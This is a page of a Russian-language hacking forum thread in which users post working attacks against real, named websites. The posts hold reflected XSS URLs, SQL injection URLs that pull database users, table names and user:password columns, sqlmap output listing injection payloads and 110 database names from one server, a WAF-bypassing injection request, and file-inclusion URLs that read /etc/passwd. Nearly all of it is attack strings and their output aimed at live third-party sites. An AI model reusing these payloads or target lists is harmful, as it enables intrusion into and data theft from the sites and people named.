HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Перезагрузить страницу Уязвимости SQLi, XSS и другие.
   
Ответ
Страница 31 из 35 « Первая < 21 27 28 29 30 31 32 33 34 35 >
 
Опции темы Поиск в этой теме Опции просмотра

  #301  
Старый 23.03.2018, 20:39
Vip77
Guest
Сообщений: n/a
Провел на форуме:
46989

Репутация: 20
По умолчанию
Код:
Code:
https://www.edmunds.com/a/?":""});alert(document.cookie);//
http://oregonstate.edu/training/course_search.php?subject=">alert(999)
https://lyricstranslate.com/?page=">alert(7889789)
http://720pizle.com/ara.asp?a=">alert(7889789)
http://epinions.com/search/books/63715?">alert(6456456)
https://mgronline.com/south/1232/search?searchTxt=">alert(045839)
http://naszemiasto.pl/firmy/,polska,78425,21.html?miasto=">alert(4389)
http://www3.gogoanime.tv/">alert(4389)
https://bursadabugun.com/ruya-tabirleri/?q[keyword]=">alert(4389)
https://computerhoy.com/listas/internet/mejores-cascos-auriculares-inalambricos-2016-32365?page=alert(4389)
https://warframe.market/alert(4389)
https://goal.in.th/%E0%B8%9C%E0%B8%A5%E0%B8%9A%E0%B8%AD%E0%B8%A5%E0%B8%A2%E0%B9%89%E0%B8%AD%E0%B8%99%E0%B8%AB%E0%B8%A5%E0%B8%B1%E0%B8%87/?Line=">alert(4389)
http://www.gazetevatan.com/Default.aspx?aType=';alert();//
http://thebitcoincode.com/video.php?poster=">alert(4389)
https://gamebanana.com/tools?">alert(4389)
https://indosport.com/">alert(4389)
http://brasilescola.uol.com.br/">alert(4389)
https://watchasian.co/">alert(4389)
https://mgronline.com/south/1232/search?searchTxt=">alert(4389)
http://portail.free.fr/services/pagesjaunes/bons-plans.php?where=">alert(4389)
http://minnstate.edu/jobs/searchResults.php?">alert(4389)
https://eadaily.com/">alert(00088)
http://projectfreetv.bz/hd/project.php?title=alert(4389)
http://cnrtl.fr/lexiques/morphalou/licence_morphalou.php?version=">alert(4389)
 
Ответить с цитированием

  #302  
Старый 23.06.2018, 14:35
Octavian
Guest
Сообщений: n/a
Провел на форуме:
97114

Репутация: 24
По умолчанию
Цитата:
Сообщение от BabaDook  
BabaDook said:

Код HTML:
HTML:
http://www.infocom.md/beneficiari.php?id=1%27+UnIoN+SeLEct+1,user(),(select(select+concat(@:=0xa7,(select+count(*)from(information_schema.columns)where(@:=concat(@,0x3c6c693e,table_name,0x3a,column_name))),@)))+--+-
/threads/426171/page-6

Выкладывал уже
 
Ответить с цитированием

  #303  
Старый 19.10.2018, 18:13
fiji
Guest
Сообщений: n/a
Провел на форуме:
1185

Репутация: 8
По умолчанию
Код:
Code:
http://wrestling.work/eventchapter.php?id=2%27+union+select+1,2,(select(@x)from(select(@x:=0x00),(select(0)from(tione_igs.applications)where(0x00)in(@x:=concat(@x,0x3c62723e,user,0x3a,pass))))x),4,5,6,7,8,9,10--+1
 
Ответить с цитированием

  #304  
Старый 20.10.2018, 03:59
lukeone
Guest
Сообщений: n/a
Провел на форуме:
2109

Репутация: 1
По умолчанию
Код:
Code:
http://cpa-monsters.ru/" AND (SELECT 2809 FROM(SELECT COUNT(*),CONCAT(0x716b626a71,(SELECT (ELT(2809=2809,1))),0x716b766b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND "qGaW"="qGaW
.SpoilerTarget" type="button">Spoiler: from sqlmap
Parameter: #1* (URI)

Type: boolean-based blind

Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)

Payload: http://cpa-monsters.ru:80/" AND MAKE_SET(1782=1782,4508) AND "lURK"="lURK

Vector: AND MAKE_SET([INFERENCE],[RANDNUM])

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)

Payload: http://cpa-monsters.ru:80/" AND (SELECT 2809 FROM(SELECT COUNT(*),CONCAT(0x716b626a71,(SELECT (ELT(2809=2809,1))),0x716b766b71,FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND "qGaW"="qGaW

Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

Type: stacked queries

Title: MySQL > 5.0.11 stacked queries (comment)

Payload: http://cpa-monsters.ru:80/";SELECT SLEEP(5)#

Vector: ;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])#

Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind

Payload: http://cpa-monsters.ru:80/" AND SLEEP(5) AND "IisV"="IisV

Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])

.SpoilerTarget" type="button">Spoiler: bd
available databases [110]:
[*] 1poverennaya.ru
[*] 3dschool.akadem-art.ru
[*] acmoda_fashion
[*] akadem-art.ru
[*] amsterdam.ru
[*] amur-tiger
[*] api.olit.su
[*] apteki.ru
[*] at
[*] ayashiclimat
[*] berendeevo
[*] bitrix_55
[*] cargoflies.ru
[*] civlife
[*] cookies
[*] cpa
[*] cpa-monsters.ru
[*] crypto
[*] cv79250_db
[*] db1050525_rpfm
[*] dev.check-car.io
[*] dish.ru
[*] docdoc
[*] dojoy.ru
[*] dreamwood
[*] el-torg.ru
[*] fefectu_fikcii
[*] game4art.ru
[*] gidrolica
[*] greencontinent.bio
[*] hockeyfamily
[*] hostel
[*] information_schema
[*] informed
[*] irasmarovoz
[*] kordik-psyhelp
[*] kz_health
[*] lecture
[*] led1080.ru
[*] lesspas
[*] light
[*] lotmo
[*] mailer
[*] maxphoto
[*] medelement.ru
[*] messenger
[*] metalnastil.ru
[*] miel.ru
[*] modelery
[*] mototelega
[*] mysql
[*] nanokeratin-shop
[*] new.olit.su
[*] new_olit
[*] newoleg
[*] olit_su
[*] olmatveeva.ru
[*] pdns
[*] performance_schema
[*] photoluxor
[*] picture
[*] pineapple
[*] powerdns
[*] prazdnik
[*] pressnastil.ru
[*] profdoctors.ru
[*] push
[*] radio.ru
[*] recraft.ru-yii
[*] redmine
[*] rekomendacii
[*] remcraft.ru
[*] remcraft.ru-new
[*] remcraft.ru-new1!!
[*] resthistory
[*] rlogistika
[*] seobirds
[*] seorakerus
[*] seowant.ru
[*] sflegaladvice
[*] siluet.su
[*] sitemanager0
[*] skld
[*] social
[*] sound_olit
[*] sound_olit_su
[*] sport
[*] spz-rus.ru
[*] stroynastil.ru
[*] stroynastil.ru1
[*] sveng
[*] telegramm
[*] test
[*] umgear.ru
[*] union.ru
[*] union.ru-old
[*] vault-pdm.ru
[*] velespro.com
[*] videoportal
[*] visagestyle
[*] water-check.ru
[*] wawtalk.io
[*] webmonsters
[*] whoknow.ru
[*] yandex_bot
[*] yiilab
[*] ymga.ru
[*] ymga.ru-new
[*] zabbix
[*] zaem-info.ru
 
Ответить с цитированием

  #305  
Старый 06.11.2018, 23:48
Franky_T
Guest
Сообщений: n/a
Провел на форуме:
5696

Репутация: 58
По умолчанию
Здравствуйте)

На форуме первый день, попробую тоже.

1. SQL-инъекция с обходом WAF

Код:
Code:
GET /noticia.php?id=-738+/*!50000union*/+/*!50000select*/+111,222,/*!50000gROup_cONcat(table_name,0x0a)%20*/,444,555,666,777,888,999,1010,1111,1212,1313,1414,1515,1616,1717+from+/*!50000inforMAtion_schema*/.tables+%20/*!50000wHEre*/+/*!50000taBLe_scheMA%20*/like+database()--+ HTTP/1.1
Host: www.cdlmacapa.com.br
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
2. SQL-инъекция с выводом в ошибке

Код:
Code:
http://steelflex.com.br/subcategoria.php?id=1+AND+extractvalue(1,concat(0x3a,(select+user()+limit+0,1)))
 
Ответить с цитированием

  #306  
Старый 10.11.2018, 20:34
Franky_T
Guest
Сообщений: n/a
Провел на форуме:
5696

Репутация: 58
По умолчанию
Еще немножко - теперь LFI.

Код:
Code:
http://www.unisescon.org.br/index.php?pagina=/etc/passwd&evento=13774

https://www.fecic.es/admin/index.php?pagina=descargar&doc=../../../../../../../../../../../../etc/passwd&linial=true&seccio=premsa&tipus=1&email=marketing@fcostabrava.com```

http://www.bolyai-zenta.edu.rs/index.php?page=../../../../../../../../../../../etc/passwd

http://www.crt.unige.it/EN/index.php?pagina=php://filter/convert.base64-encode/resource=/etc/passwd
 
Ответить с цитированием

  #307  
Старый 07.01.2019, 15:46
qwaszx000
Guest
Сообщений: n/a
Провел на форуме:
8405

Репутация: 7
По умолчанию
Код:
Code:
https://www.bible-history.com/subcat.php?id=-1%20union%20all%20select%20user()%20--%20

rusty@localhost
5.5.62
bible_history
 
Ответить с цитированием

  #308  
Старый 07.01.2019, 16:39
Егорыч+++
Познавший АНТИЧАТ
Регистрация: 27.05.2002
Сообщений: 1,241
Провел на форуме:
20377164

Репутация: 0


По умолчанию
Цитата:
Сообщение от qwaszx000  
qwaszx000 said:

Код:
Code:
https://www.bible-history.com/subcat.php?id=-1%20union%20all%20select%20user()%20--%20

rusty@localhost
5.5.62
bible_history
Все было бы хорошо, но оно гуглится и похоже этой баге года два уже.
 
Ответить с цитированием

  #309  
Старый 06.02.2019, 00:42
Numb
Guest
Сообщений: n/a
Провел на форуме:
641

Репутация: 1
По умолчанию
 
Ответить с цитированием

  #310  
Старый 16.02.2019, 00:36
Numb
Guest
Сообщений: n/a
Провел на форуме:
641

Репутация: 1
По умолчанию
 
Ответить с цитированием
Ответ
Страница 31 из 35 « Первая < 21 27 28 29 30 31 32 33 34 35 >



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ